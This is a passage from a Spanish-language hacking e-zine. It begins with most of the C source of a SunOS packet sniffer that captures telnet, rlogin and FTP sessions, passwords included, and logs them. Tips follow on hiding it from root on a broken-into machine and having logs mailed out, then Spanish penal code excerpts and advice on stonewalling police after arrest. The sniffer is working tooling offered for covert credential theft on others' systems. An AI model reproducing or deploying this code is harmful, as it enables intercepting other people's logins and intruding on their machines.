  12309.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe-
  12310. >SRCport));
  12311.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  12312.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  12313.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  12314.    fprintf(LOG," DATA: ");
  12315.     { register u_int i = CLe->Length;
  12316.       register u_char *p = CLe->Data;
  12317.       PR_DATA(p,i);
  12318.       PR_DATA(d,dl);
  12319.     }
  12320.  
  12321.    fprintf(LOG,"\n-- \n");
  12322.    fflush(LOG);
  12323.  
  12324.    if(CLe->Next != NULL)
  12325.     CLe->Next->Last = CLe->Last;
  12326.    if(CLe->Last != NULL)
  12327.     CLe->Last->Next = CLe->Next;
  12328.    else
  12329.     CLroot = CLe->Next;
  12330.    free(CLe);
  12331. }
  12332.  
  12333. /* 30 mins (x 60 seconds) */
  12334. #define IDLE_TIMEOUT 1800
  12335. #define IDLE_NODE() { \
  12336.   time_t tm; \
  12337.   time(&tm); \
  12338.   if(LastTIME<tm) { \
  12339.      register struct CREC *CLe,*CLt = CLroot; \
  12340.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  12341.      while(CLe=CLt) { \
  12342.        CLt=CLe->Next; \
  12343.        if(CLe->Time <tm) \
  12344.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  12345.      } \
  12346.   } \
  12347. }
  12348.  
  12349. void filter(cp, pktlen)
  12350. register char *cp;
  12351. register u_int pktlen;
  12352. {
  12353.  register struct ip     *ip;
  12354.  register struct tcphdr *tcph;
  12355.  
  12356.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  12357.  
  12358.    if(EtherType < 0x600) {
  12359.      EtherType = *(u_short *)(cp + SZETH + 6);
  12360.      cp+=8; pktlen-=8;
  12361.    }
  12362.  
  12363.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  12364.       return;
  12365.  }
  12366.  
  12367.     /* ugh, gotta do an alignment :-( */
  12368.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  12369.  
  12370.  ip = (struct ip *)Packet;
  12371.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  12372.     return;
  12373.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  12374.  
  12375.  if(!( (TCPD == IPPORT_TELNET) ||
  12376.        (TCPD == IPPORT_LOGINSERVER) ||
  12377.        (TCPD == IPPORT_FTP)
  12378.    )) return;
  12379.  
  12380.  { register struct CREC *CLm;
  12381.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  12382.    register u_char *p = (u_char *)Packet;
  12383.  
  12384.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  12385.  
  12386.  if(debug) {
  12387.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  12388.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  12389.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  12390.  }
  12391.  
  12392.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  12393.  
  12394.       CLm->PKcnt++;
  12395.  
  12396.       if(length>0)
  12397.         if( (CLm->Length + length) < MAXBUFLEN ) {
  12398.           ADDDATA_NODE( CLm, p,length);
  12399.         } else {
  12400.           END_NODE( CLm, p,length, "DATA LIMIT");
  12401.         }
  12402.  
  12403.       if(TCPFL(TH_FIN|TH_RST)) {
  12404.           END_NODE( CLm, (u_char 
  12405. *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  12406.       }
  12407.  
  12408.    } else {
  12409.  
  12410.       if(TCPFL(TH_SYN)) {
  12411.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  12412.       }
  12413.  
  12414.    }
  12415.  
  12416.    IDLE_NODE();
  12417.  
  12418.  }
  12419.  
  12420. }
  12421.  
  12422. /* signal handler
  12423.  */
  12424. void death()
  12425. { register struct CREC *CLe;
  12426.  
  12427.     while(CLe=CLroot)
  12428.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  12429.  
  12430.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  12431.     fflush(LOG);
  12432.     if(LOG != stdout)
  12433.         fclose(LOG);
  12434.     exit(1);
  12435. }
  12436.  
  12437. /* opens network interface, performs ioctls and reads from it,
  12438.  * passing data to filter function
  12439.  */
  12440. void do_it()
  12441. {
  12442.     int cc;
  12443.     char *buf;
  12444.     u_short sp_ts_len;
  12445.  
  12446.     if(!(buf=malloc(CHUNKSIZE)))
  12447.         Pexit(1,"Eth: malloc");
  12448.  
  12449. /* this /dev/nit initialization code pinched from etherfind */
  12450.   {
  12451.     struct strioctl si;
  12452.     struct ifreq    ifr;
  12453.     struct timeval  timeout;
  12454.     u_int  chunksize = CHUNKSIZE;
  12455.     u_long if_flags  = NI_PROMISC;
  12456.  
  12457.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  12458.         Pexit(1,"Eth: nit open");
  12459.  
  12460.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  12461.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  12462.  
  12463.     si.ic_timout = INFTIM;
  12464.  
  12465.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  12466.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  12467.  
  12468.     timeout.tv_sec = 1;
  12469.     timeout.tv_usec = 0;
  12470.     si.ic_cmd = NIOCSTIME;
  12471.     si.ic_len = sizeof(timeout);
  12472.     si.ic_dp  = (char *)&timeout;
  12473.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  12474.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  12475.  
  12476.     si.ic_cmd = NIOCSCHUNK;
  12477.     si.ic_len = sizeof(chunksize);
  12478.     si.ic_dp  = (char *)&chunksize;
  12479.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  12480.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  12481.  
  12482.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  12483.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  12484.     si.ic_cmd = NIOCBIND;
  12485.     si.ic_len = sizeof(ifr);
  12486.     si.ic_dp  = (char *)𝔦
  12487.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  12488.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  12489.  
  12490.     si.ic_cmd = NIOCSFLAGS;
  12491.     si.ic_len = sizeof(if_flags);
  12492.     si.ic_dp  = (char *)&if_flags;
  12493.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  12494.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  12495.  
  12496.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  12497.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  12498.   }
  12499.  
  12500.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  12501.         register char *bp = buf,
  12502.                       *bufstop = (buf + cc);
  12503.  
  12504.         while (bp < bufstop) {
  12505.             register char *cp = bp;
  12506.             register struct nit_bufhdr *hdrp;
  12507.  
  12508.             hdrp = (struct nit_bufhdr *)cp;
  12509.             cp += sizeof(struct nit_bufhdr);
  12510.             bp += hdrp->nhb_totlen;
  12511.             filter(cp, (u_long)hdrp->nhb_msglen);
  12512.         }
  12513.     }
  12514.     Pexit((-1),"Eth: read");
  12515. }
  12516.  /* Authorize your proogie,generate your own password and uncomment here */
  12517. /* #define AUTHPASSWD "EloiZgZejWyms" */
  12518.  
  12519. void getauth()
  12520. { char *buf,*getpass(),*crypt();
  12521.   char pwd[21],prmpt[81];
  12522.  
  12523.     strcpy(pwd,AUTHPASSWD);
  12524.     sprintf(prmpt,"(%s)UP? ",ProgName);
  12525.     buf=getpass(prmpt);
  12526.     if(strcmp(pwd,crypt(buf,pwd)))
  12527.         exit(1);
  12528. }
  12529.     */
  12530. void main(argc, argv)
  12531. int argc;
  12532. char **argv;
  12533. {
  12534.     char   cbuf[BUFSIZ];
  12535.     struct ifconf ifc;
  12536.     int    s,
  12537.            ac=1,
  12538.            backg=0;
  12539.  
  12540.     ProgName=argv[0];
  12541.  
  12542.  /*     getauth(); */
  12543.  
  12544.     LOG=NULL;
  12545.     device=NULL;
  12546.     while((ac<argc) && (argv[ac][0] == '-')) {
  12547.        register char ch = argv[ac++][1];
  12548.        switch(toupper(ch)) {
  12549.             case 'I': device=argv[ac++];
  12550.                       break;
  12551.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  12552.                          Zexit(1,"Output file cant be opened\n");
  12553.                       break;
  12554.             case 'B': backg=1;
  12555.                       break;
  12556.             case 'D': debug=1;
  12557.                       break;
  12558.             default : fprintf(ERR,
  12559.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  12560.                             ProgName);
  12561.                       exit(1);
  12562.        }
  12563.     }
  12564.  
  12565.     if(!device) {
  12566.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  12567.             Pexit(1,"Eth: socket");
  12568.  
  12569.         ifc.ifc_len = sizeof(cbuf);
  12570.         ifc.ifc_buf = cbuf;
  12571.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  12572.             Pexit(1,"Eth: ioctl");
  12573.  
  12574.         close(s);
  12575.         device = ifc.ifc_req->ifr_name;
  12576.     }
  12577.  
  12578.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  12579.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  12580.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  12581.  
  12582.     if(!LOG)
  12583.         LOG=stdout;
  12584.  
  12585.     signal(SIGINT, death);
  12586.     signal(SIGTERM,death);
  12587.     signal(SIGKILL,death);
  12588.     signal(SIGQUIT,death);
  12589.  
  12590.     if(backg && debug) {
  12591.          fprintf(ERR,"[Cannot bg with debug on]\n");
  12592.          backg=0;
  12593.     }
  12594.  
  12595.     if(backg) {
  12596.         register int s;
  12597.  
  12598.         if((s=fork())>0) {
  12599.            fprintf(ERR,"[pid %d]\n",s);
  12600.            exit(0);
  12601.         } else if(s<0)
  12602.            Pexit(1,"fork");
  12603.  
  12604.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  12605.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  12606.                 close(s);
  12607.         }
  12608.     }
  12609.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  12610.     fflush(LOG);
  12611.  
  12612.     do_it();
  12613. }
  12614.  
  12615. ------------ FIN -------------------------------------------------------------
  12616.  
  12617.         Lo que se ha de tener en cuenta cuando instalas un sniffer en una
  12618.   maquina es que como es logico, si hay mucho trafico de paquetes en esa
  12619.   maquina y no seleccionais bien la forma de filtrar que info queda en el log
  12620.   y cual no, se pueden generar ficheros de logs grandisimos por lo que este es
  12621.   un factor muy a tener en cuenta porque a veces si te equivocas.. se crea un
  12622.   fichero grandisimo, el root se percata y a la mierda todo el trabajo :o(
  12623.  
  12624.         Dependiendo de la makina y su trafico puede ser suficiente mirar los
  12625.   logs cada semana mas o menos o cada dos. Tambien, si eres comodo puedes
  12626.   usar un cronjob que te mailee los logs, pero eso kanta mas :)
  12627.  
  12628.   11.- LEGALIDAD
  12629.  
  12630.         Para acabar el articulo, creo que debo de acabar con esto ya que
  12631.   siempre hay que recordar que todo esto es ilegal... luego no digais que no
  12632.   estais avisados aunque tambien depende de lo que hagais. En realidad, opino
  12633.   que por entrar en una maquina y hacer cuatro cosas sin hacer daño a nadie
  12634.   ni haciendoles perder datos, ni haciendolo por motivos de lucro o para
  12635.   destrozar cosas, esto no deberia ser ilegal pero en fin.. la guardia civil
  12636.   en lugar de dedicarse a perseguir a toda la mala gente que hay por ahi, se
  12637.   dedica a jodernos a nosotros.. la vida es asi :o(
  12638.  
  12639.         Sinceramente, no se si este codigo penal es el que nos interesa a
  12640.   nosotros ya que de leyes no tengo ni idea, pero lo he pillado por ahi y
  12641.   creo que es interesante que por lo menos le deis una leida:
  12642.  
  12643.         Ademas adjunto un texto como sobre comportarse si pasa algo que
  12644.   aunque esta orientado al caso de pirateria de software, creo que es
  12645.   sencilla su extrapolacion al caso que nos ocupa.
  12646.  
  12647.   NUEVO CODIGO PENAL 
  12648.  
  12649.   DELITOS RELACIONADOS CON LAS TECNOLOGIAS DE LA INFORMACION
  12650.  
  12651.   TITULO X 
  12652.  
  12653.         Delitos contra la intimidad, el derecho a la propia imagen y la
  12654.   inviolabilidad del domicilio 
  12655.  
  12656.   CAPITULO I 
  12657.  
  12658.         Del descubrimiento y revelacion de secretos 
  12659.  
  12660.   Articulo 197 
  12661.  
  12662.         1. El que para descubrir los secretos o vulnerar la intimidad de
  12663.   otro, sin su consentimiento, se apodere de sus papeles, cartas, mensajes de
  12664.   correo electronico o cualesquiera otros documentos o efectos personales o
  12665.   intercepte sus telecomunicaciones o utilice artificios tecnicos de escucha,
  12666.   transmision, grabacion o reproduccion del sonido o de la imagen, o de
  12667.   cualquier otra señal de comunicacion, sera castigado con las penas de
  12668.   prision de uno a cuatro años y multa de doce a veinticuatro meses. 
  12669.  
  12670.         2. Las mismas penas se impondran al que, sin estar autorizado, se
  12671.   apodere, utilice o modifique, en perjuicio de tercero, datos reservados de
  12672.   caracter personal o familiar de otro que se hallen registrados en ficheros
  12673.   o soportes informaticos, electronicos o telematicos, o en cualquier otro
  12674.   tipo de archivo o registro publico o privado. Iguales penas se impondran a
  12675.   quien, sin estar autorizado, acceda por cualquier medio a los mismos y a
  12676.   quien los altere o utilice en perjuicio del titular de los datos o de un
  12677.   tercero.
  12678.  
  12679.         3. Se impondra la pena de prision de dos a cinco años si se difunden,
  12680.   revelan o ceden a terceros los datos o hechos descubiertos o las imagenes
  12681.   captadas a que se refieren los numeros anteriores. Sera castigado con las
  12682.   penas de prision de uno a tres años y multa de doce a veinticuatro meses,
  12683.   el que, con conocimiento de su origen ilicito y sin haber tomado parte en
  12684.   su descubrimiento, realizare la conducta descrita en el parrafo anterior. 
  12685.  
  12686.         4. Si los hechos descritos en los apartados 1 y 2 de este articulo
  12687.   se realizan por las personas encargadas o responsables de los ficheros,
  12688.   soportes informaticos, electronicos o telematicos, archivos o registros, se
  12689.   impondra la pena de prision de tres a cinco años, y si se difunden, ceden o
  12690.   revelan los datos reservados, se impondra la pena en su mitad superior. 
  12691.  
  12692.         5. Igualmente, cuando los hechos descritos en los apartados anteriores
  12693.   afecten a datos de caracter personal que revelen la ideologia, religion,
  12694.   creencias, salud, origen racial o vida sexual, o la victima fuere un menor
  12695.   de edad o un incapaz, se impondran las penas previstas en su mitad superior. 
  12696.  
  12697.         6. Si los hechos se realizan con fines lucrativos, se impondran las
  12698.   penas respectivamente previstas en los apartados 1 al 4 de este articulo en
  12699.   su mitad superior. Si ademas afectan a datos de los mencionados en el
  12700.   apartado 5, la pena a imponer sera la de prision de cuatro a siete años. 
  12701.  
  12702.   Articulo 198 
  12703.  
  12704.         La autoridad o funcionario publico que, fuera de los casos permitidos
  12705.   por la Ley, sin mediar causa legal por delito, y prevaliendose de su cargo,
  12706.   realizare cualquiera de las conductas descritas en el articulo anterior,
  12707.   sera castigado con las penas respectivamente previstas en el mismo, en su
  12708.   mitad superior y, ademas, con la de inhabilitacion absoluta por tiempo de
  12709.   seis a doce años.  
  12710.  
  12711.   Articulo 199
  12712.  
  12713.         1. El que revelare secretos ajenos, de los que tenga conocimiento por
  12714.   razon de su oficio o sus relaciones laborales, sera castigado con la pena
  12715.   de prision de uno a tres años y multa de seis a doce meses. 
  12716.  
  12717.         2. El profesional que, con incumplimiento de su obligacion de sigilo
  12718.   o reserva, divulgue los secretos de otra persona, sera castigado con la
  12719.   pena de prision de uno a cuatro años, multa de doce a veinticuatro meses e
  12720.   inhabilitacion especial para dicha profesion por tiempo de dos a seis años. 
  12721.  
  12722.   Articulo 200 
  12723.  
  12724.         Lo dispuesto en este capitulo sera aplicable al que descubriere,
  12725.   revelare o cediere datos reservados de personas juridicas, sin el
  12726.   consentimiento de sus representantes, salvo lo dispuesto en otros preceptos
  12727.   de este codigo.
  12728.  
  12729.   Articulo 201 
  12730.  
  12731.         1. Para proceder por los delitos previstos en este capitulo sera
  12732.   necesaria denuncia de la persona agraviada o de su representante legal.
  12733.   Cuando aquella sea menor de edad, incapaz o una persona desvalida, tambien
  12734.   podra denunciar el Ministerio Fiscal.  
  12735.  
  12736.         2. No sera precisa la denuncia exigida en el apartado anterior para
  12737.   proceder por los hechos descritos en el articulo 198 de este Codigo, ni
  12738.   cuando la comision del delito afecte a los intereses generales o a una
  12739.   pluralidad de personas. 
  12740.  
  12741.         3. El perdon del ofendido o de su representante legal, en su caso,
  12742.   extingue la accion penal o la pena impuesta, sin perjuicio de lo dispuesto
  12743.   en el segundo parrafo del numero 4º del articulo 130. 
  12744.    
  12745.   Articulo 248. 
  12746.  
  12747.         1.- Cometen estafa los que, con animo de lucro, utilizaren engaño
  12748.   bastante para producir error en otro, induciendolo a realizar un acto de
  12749.   disposicion en perjuicio propio o ajeno. 
  12750.  
  12751.         2.- Tambien se consideran reos de estafa los que, con animo de lucro,
  12752.   y valiendose de alguna manipulacion informatica o artificio semejante
  12753.   consigan la transferencia no consentida de cualquier activo patrimonial en
  12754.   perjuicio de tercero.
  12755.  
  12756.   Articulo 263. 
  12757.  
  12758.         El que causare daños en propiedad ajena no comprendidos en otros
  12759.   Titulos de este Codigo, sera castigado con la pena de multa de seis a
  12760.   veinticuatro meses, atendidas la condicion economica de la victima y la
  12761.   cuantia del daño, si este excediera de cincuenta mil pesetas. 
  12762.  
  12763.   Articulo 264. 
  12764.  
  12765.         1.- Sera castigado con la pena de prision de uno a tres años y multa
  12766.   de doce a veinticuatro meses el que causare daños expresados en el articulo
  12767.   anterior, si concurriera alguno de los supuestos siguientes:
  12768.  
  12769.         1º.- Que se realicen para impedir el libre ejercicio de la autoridad
  12770.   o en venganza de sus determinaciones, bien se cometiere el delito contra 
  12771.   funcionarios publicos, bien contra particulares que, como testigos o de 
  12772.   cualquier otra manera, hayan contribuido o pueden contribuir a la ejecucion
  12773.   o aplicacion de las Leyes o disposiciones generales. 
  12774.  
  12775.     2º.-Que se cause por cualquier medio infeccion o contagio de ganado. 
  12776.  
  12777.     3º.-Que se empleen sustancias venenosas o corrosivas. 
  12778.  
  12779.     4º.- Que afecten a bienes de dominio o uso publico o comunal. 
  12780.  
  12781.     5º.- Que arruinen al perjudicado o se le coloque en grave situacion 
  12782.              economica. 
  12783.  
  12784.     2.- La misma pena se impondra al que por cualquier medio destruya, 
  12785.   altere, inutilice o de cualquier otro modo dañe los datos, programas o 
  12786.   documentos electronicos ajenos contenidos en redes, soportes o sistemas 
  12787.   informaticos. 
  12788.  
  12789.   CAPITULO XI  
  12790.  
  12791.         De los delitos relativos a la propiedad intelectual e industrial, al
  12792.   mercado y a los consumidores 
  12793.  
  12794.         Seccion 1ª.- DE LOS DELITOS RELATIVOS A LA PROPIEDAD INTELECTUAL. 
  12795.  
  12796.   Articulo 270. 
  12797.  
  12798.         Sera castigado con la pena de prision de seis meses a dos años o de 
  12799.   multa de seis a veinticuatro meses quien, con animo de lucro y en perjuicio
  12800.   de tercero, reproduzca, plagie, distribuya o comunique publicamente, en
  12801.   todo o en parte, una obra literaria, artistica o cientifica, o su
  12802.   transformacion, interpretacion o ejecucion artisitica fijada en cualquier
  12803.   tipo de soporte o comunicada a traves de cualquier medio, sin la
  12804.   autorizacion de los titulares de los correspondientes derechos de propiedad
  12805.   intelectual o de sus cesionarios. 
  12806.  
  12807.     La misma pena se impondra a quien intencionadamente importe, exporte
  12808.   o almacene ejemplares de dichas obras o producciones o ejecuciones sin la 
  12809.   referida autorizacion. 
  12810.  
  12811.     Sera castigada tambien con la misma pena la fabricacion, puesta en 
  12812.   circulacion y tenencia de cualquier medio especificamente destinada a
  12813.   facilitar la supresion no autorizada o la neutralizacion de cualquier
  12814.   dispositivo tecnico que se haya utilizado para proteger  programas de
  12815.   ordenador.
  12816.  
  12817.   Articulo 278. 
  12818.  
  12819.         1.- El que, para descubrir un secreto de empresa se apoderare por
  12820.   cualquier medio de datos, documentos escritos o electronicos, soportes
  12821.   informaticos u otros objetos que se refieran al mismo, o empleare alguno de
  12822.   los medios o instrumentos señalados en el apartado 1 del articulo 197, sera
  12823.   castigado con la pena de prision de dos a cuatro años y multa de doce a
  12824.   veinticuatro meses.
  12825.  
  12826.         2.- Se impondra la pena de prision de tres a cinco años y multa de
  12827.   doce a veinticuatro meses si se difundieren, revelaren o cedieren a
  12828.   terceros los secretos descubiertos. 
  12829.  
  12830.         3.- Lo dispuesto en el presente articulo se entendera sin perjuicio de
  12831.   las penas que pudieran corresponder por el apoderamiento o destruccion de
  12832.   los soportes informaticos. 
  12833.  
  12834.   CAPITULO III 
  12835.  
  12836.   Disposicion general 
  12837.  
  12838.   Articulo 400. 
  12839.  
  12840.         La fabricacion o tenencia de utiles, materiales , instrumentos,
  12841.   sustancias, maquinas, programas de ordenador o aparatos, especificamente
  12842.   destinados a la comision de los delitos descritos en los capitulos
  12843.   anteriores, se castigaran con la pena señalada en cada paso para los
  12844.   autores.
  12845.  
  12846.   Articulo 536. 
  12847.  
  12848.         La autoridad, funcionario publico o agente de estos que, mediando
  12849.   causa por delito, interceptare las telecomunicaciones o utilizare
  12850.   artificios tecnicos de escuhas, transmision, grabacion o reproduccion del
  12851.   sonido, de la imagen o de cualquier otra señal de comunicacion, con
  12852.   violacion de las garantias constitucionales o legales, incurrira en la pena
  12853.   de inhabilitacion especial para empleo o cargo publico de dos a seis años. 
  12854.   Si divulgare o revelare la informacion obtenida, se impondran las penas de 
  12855.   inhabilitacion especial, en su mitad superior y, ademas la de multa de seis
  12856.   a dieciocho meses.
  12857.  
  12858.         Ademas adjunto un texto de shooting que he pillado en la red y que da
  12859.   algunos consejos... aunque en principio se refiere a la venta de software
  12860.   ilegal, lo he adjuntado ya que su extrapolacion al caso que nos ocupa es
  12861.   sencilla y quiza algun dia nos haga falta :o(
  12862.  
  12863.         Establece el articulo 520 de la Ley de Enjuiciamiento Criminal. que
  12864.   toda persona detenida o presa sera informada, de modo que le sea
  12865.   comprensible, y de forma inmediata, de los hechos que se le imputan y las
  12866.   razones motivadoras de su privacion de libertad, asi como de los derechos
  12867.   que le asisten y especialmente de los siguientes: 
  12868.  
  12869.         Derecho a guardar silencio no declarando si no quiere, a no contestar
  12870.   alguna o algunas de las preguntas que le formulen, o a manifestar que solo
  12871.   declarara ante el Juez. La mejor forma de ejercitar este derecho es no
  12872.   decir nada. Asi de sencillo y aunque parezca una perogrullada, desde el
  12873.   principio, desde el mismo momento de la detencion, nada, absolutamente nada.
  12874.  
  12875.         La policia querra saber donde estan los Cds, la agenda del detenido, a
  12876.   quien le ha comprado y vendido este el material, etc. En ese momento, lo
  12877.   mejor que puede hacer el detenido es sonreir... y guardar silencio.
  12878.  
  12879.         Pese a lo que se le hace creer al ciudadano desde la escuela, el
  12880.   detenido no tiene ninguna obligacion de colaborar con la policia, y lo que
  12881.   diga solo le puede perjudicar.
  12882.  
  12883.         No esta de mas comentar en este punto que cualquier intento de
  12884.   sonsacar al detenido con cualquier tipo de coaccion, por suave que parezca,
  12885.   debe ser denunciado en la primera declaracion ante el Juez. Es muy posible
  12886.   que se informe al detenido que si declara, lo dejaran inmediatamente en
  12887.   libertad, y que si no lo hace, detendran a sus amigos o familiares, o
  12888.   avisaran a su empresa. Teniendo en cuenta que el detenido en este tipo de
  12889.   delitos suele ser joven e inexperto, este tipo de presiones son
  12890.   intolerables y deben denunciarse a la primera oportunidad. 
  12891.  
  12892.         Derecho a no declarar contra si mismo y a no confesarse culpable.
  12893.   Esta intimamente relacionado con el derecho anterior, del que trae causa.
  12894.  
  12895.         Derecho a designar Abogado y a solicitar su presencia para que asista
  12896.   a las diligencias policiales y judiciales de declaracion e intervenga en
  12897.   todo reconocimiento de identidad de que sea objeto. 
  12898.  
  12899.         Si el detenido o preso no designara Abogado, se procedera a la
  12900.   designacion de oficio. No es imprescindible avisar al abogado de confianza,
  12901.   dado que en el supuesto de no declarar, es indiferente que a dicha negativa
  12902.   asista un letrado particular, o el de oficio Lo que sucede es que en el caso
  12903.   de cambiar posteriormente de abogado, se incrementan los gastos, dado que
  12904.   se ha de abonar la minuta al primer designado. Una vez firmada la negativa
  12905.   a declarar, el detenido tiene derecho a una entrevista a solas con el
  12906.   letrado, para preparar la declaracion ante el Juez, en la que si es
  12907.   conveniente asesorarse con alguien que entienda de informatica. 
  12908.  
  12909.         Derecho a que se ponga en conocimiento del familiar o persona que
  12910.   desee, el hecho de la detencion y el lugar de custodia en que se halle en
  12911.   cada momento.
  12912.  
  12913.         Los extranjeros tendran derecho a que las circunstancias *anteriores
  12914.   se comuniquen a la Oficina Consular de su pais.
  12915.  
  12916.         Deben olvidarse las vergüenzas, ya que esta en juego algo mas
  12917.   importante que una bronca familiar. Cuanta mas gente conozca la detencion,
  12918.   mejor, asi que la familia debe avisar a todos los amigos que figuren en la
  12919.   agenda del detenido, antes de que los avise la policia. Otra razon para
  12920.   avisar a la familia es que en caso que la detencion se alargue
  12921.   innecesariamente, se puede recurrir al Habeas Corpus, una peticion ante el
  12922.   Juez de Guardia para que se ponga inmediatamente al detenido en presencia
  12923.   de la autoridad judicial, lo que a veces puede ser necesario, sobre todo si
  12924.   se  trata de jovenes de animo debil...
  12925.  
  12926.         Derecho a ser asistido gratuitamente por un interprete. 
  12927.  
  12928.         Cuando se trate de extranjero que no comprenda o no hable el
  12929.   castellano. En este punto el detenido podria ponerse a exigir hablar en el
  12930.   idioma propio, lo que es perfectamente inutil cuando no se piensa
  12931.   declarar...
  12932.  
  12933.         Derecho a ser reconocido por el Medico Forense o su sustituto legal y,
  12934.   en su defecto, por el de la Institucion en que se encuentre, o por cualquier
  12935.   otro dependiente del Estado o de otras Administraciones Publicas. 
  12936.  
  12937.         Aprovechando que no tiene nada mejor que hacer, es conveniente que el 
  12938.   detenido insista en que venga el medico. Asi, ademas de pasar mas 
  12939.   entretenidas las horas de la detencion, en el supuesto de que venga el
  12940.   medico ya hay un primer diagnostico que informa que el detenido entro sin
  12941.   lesiones en comisaria. Si dicha situacion cambia, alguien tendra que dar
  12942.   explicaciones.
  12943.  
  12944.         Una vez ha pasado el miedo de la primera fase de la detencion, se
  12945.   podra reflexionar tranquilamente sobre que declarar ante el Juez. Cada caso
  12946.   es diferente, y el mas preparado para diseñar la estrategia de ese momento
  12947.   sera el abogado que libremente escoja el detenido. En cualquier caso, no
  12948.   esta de mas recordar que para que exista delito por copia ilegal de
  12949.   software, esta debe ser con animo de lucro y en perjuicio de tercero. A
  12950.   sensu contrario, pueden deducirse de ello dos consejos, a saber: 
  12951.  
  12952.         -Nunca debe reconocerse haber cobrado o pagado por una copia
  12953.  
  12954.           -Debe proclamarse solemnemente que de no copiar el software,
  12955.   tampoco lo hubiesemos comprado, lo que descarta el perjuicio del tercero,
  12956.   que no podra en tal caso argumentar que ha perdido una venta. Ya que Bill
  12957.   Gates no es altruista, seamoslo nosotros con nuestros semejantes...
  12958.  
  12959.   12.- DESPEDIDA
  12960.  
  12961.         Bien, creo que el texto ha quedado cumplidito y que cubre los
  12962.   aspectos basicos del hacking... espero que os sirva de algo ya que me he
  12963.   tenido que pegar una curradilla para escribirlo :)
  12964.  
  12965.         Agradecimientos a Zebal (!H) por dejarme reproducir su comparativa de 
  12966.   crackeadores de passwords .. thx :)
  12967.  
  12968.         Por cierto, este texto esta en formato .txt, en formato .doc, en
  12969.   formato .html y en alguno mas :).. asi que si tienes problemas para leer el
  12970.   formato que tienes, puedes mailearme para pedirmelo en otro formato.
  12971.  
  12972.         Si kieres ponerte en contacto conmigo (Daemon) para cualquier cosa
  12973.   (dudas, sugerencias e incluso dinero XDDD) puedes escribir a:
  12974.  
  12975.         Daemond@usa.net
  12976.         Dillet@usa.net
  12977.  
  12978. <────────────────────────────────────────────────────────────────────────────>
  12979. ██████████████████████████████████████████████████████████████████████████████
  12980. <────────────────────────────────────────────────────────────────────────────>
  12981.  
  12982.                              ┌─────────────────┐
  12983.                             <  EL LECTOR OPINA  >
  12984.                              └─────────────────┘
  12985.  
  12986.         Bueno parece que esta seccion esta funcionando, pero haver si para
  12987.   el siguiente numero, sois los propios lectores que respondeis a las
  12988.   preguntas, asi sera una seccion dinamica.
  12989.  
  12990.         Queremos informaros que varios mail's en USA.NET (donde nos enviais
  12991.   vuestros mail's) se han perdido por motivos tecnicos. Por eso aquellos
  12992.   lectores que nos hayais escrito y no esten aqui puestos y ademas no hayais
  12993.   espeficicado expresanemte que no quereis salir en el ezine, nos teneis
  12994.   que volver a escribir y os contestaremos en el proximo numero :) Pero no
  12995.   os quejeis que hemos includio los mail's llegados a ultima hora a la
  12996.   redaccion ;-))
  12997.  
  12998.         Tambien deciros que no hay que ponerse nervioso, cuando nos enviais
  12999.   un mail, nosotros os enviamos otro diciendo que saldra en el siguiente
  13000.   numero o no os enviamos nada ya que tampoco podemos enviar mails a todos
  13001.   los que nos envian mail (que somos simples mortales :), o sea que
  13002.   tranquilos !!!! que somos humanos nosotros tan bien, con esto queremos
  13003.   decir que no nos atosigueis enviamo mail's preguntando cuando sale, el
  13004.   ezine sale cuando sale, okis? Bueno dicho lo que teniamos que decir, que
  13005.   comienze la seccion.
  13006.  
